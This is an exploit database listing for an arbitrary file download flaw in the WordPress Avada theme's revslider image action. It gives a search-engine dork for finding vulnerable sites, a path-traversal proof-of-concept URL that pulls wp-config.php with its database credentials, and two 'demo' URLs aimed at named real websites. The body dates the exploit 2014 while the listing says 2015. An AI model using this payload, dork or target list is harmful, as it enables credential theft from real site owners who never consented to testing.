Wordpress Theme Avada Arbitrary File Download Vulnerability

🗓️ 19 Jan 2015 00:00:00Reported by vylegzhaninType

zdt🔗 0day.today👁 351 Views

Wordpress Theme Avada Arbitrary File Download Vulnerability from admin-ajax.php action revslider_show_imag

# Exploit Title: Wordpress Theme Avada Arbitrary File Download Vulnerability
 
# Date: 19/01/2014
 
# Exploit Author: Vylegzhanin
 
# Contact : [email protected]
 
# Tested on: Linux / Window
 
# Google Dork: inurl:wp-content/themes/avada
 
######################
  
# PoC
 
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
#Demo
 
http://www.teatrvfk.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://q-advisers.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2018-03-01]  #

19 Jan 2015 00:00Current

7.1High risk

Vulners AI Score7.1